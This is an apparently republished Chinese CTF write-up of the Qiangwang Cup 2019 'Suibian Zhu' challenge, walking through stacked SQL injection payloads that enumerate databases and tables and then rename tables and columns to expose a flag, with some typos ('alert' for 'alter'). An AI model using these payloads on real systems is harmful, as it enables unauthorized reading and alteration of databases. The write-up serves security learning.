首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-07-15 02:24:25
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
edge浏覽器怎麼固定導航頁
edge浏覽器怎麼固定導航頁
在即将推出的edge93浏覽器中,微軟将會對垂直标簽頁進行改進。用戶在切換到垂直标簽頁之後會看到一個新選項,在啟用之後能夠隐藏浏覽器的标題欄,以便于使用垂直标簽頁視圖時獲得額外的像素空間。微軟Edge和GoogleChrome之間的一個主要...
2026-07-15
三角形面積推導的過程手抄報
三角形面積推導的過程手抄報
三角形面積推導的過程手抄報?《三角形的面積》演示稿的制作過程說明,今天小編就來說說關于三角形面積推導的過程手抄報?下面更多詳細答案一起來看看吧!三角形面積推導的過程手抄報《三角形的面積》演示稿的制作過程說明(一)、情景導入、揭示課題通過課件...
2026-07-15
貴廣高鐵設計速度
貴廣高鐵設計速度
記者從滬昆鐵路客運專線貴州有限公司獲悉,3月24日8時18分,随着現場最後一次爆破順利完成,貴州省貴陽市至廣西壯族自治區南甯市的高速鐵路(以下簡稱貴南高鐵)最長隧道九萬大山一号隧道順利貫通,這标志着貴南高鐵進入最後沖刺階段,為全線貫通奠定了...
2026-07-15
杜鵑花怎麼養
杜鵑花怎麼養
杜鵑花怎麼養?杜鵑花養法介紹:環境:要給它一個稍微陰暗一些的環境,需要有明亮的散射光,光線不宜過強,現在小編就來說說關于杜鵑花怎麼養?下面内容希望能幫助到你,我們來一起看看吧!杜鵑花怎麼養杜鵑花養法介紹:環境:要給它一個稍微陰暗一些的環境,...
2026-07-15
根式方程100種解法
根式方程100種解法
x≥-1解法①:設原方程為①式∴[√(x²3x4)-√(x²1)][√(x²3x4)√(x²1)=[√(x²3x4)-√(x²1)](3x3)∴√(x²3x4)-√(x²1)=1…②①②:√(x²3x4)=2x2(x²3x4)=(22x)²...
2026-07-15
Copyright 2023-2026 - www.tftnews.com All Rights Reserved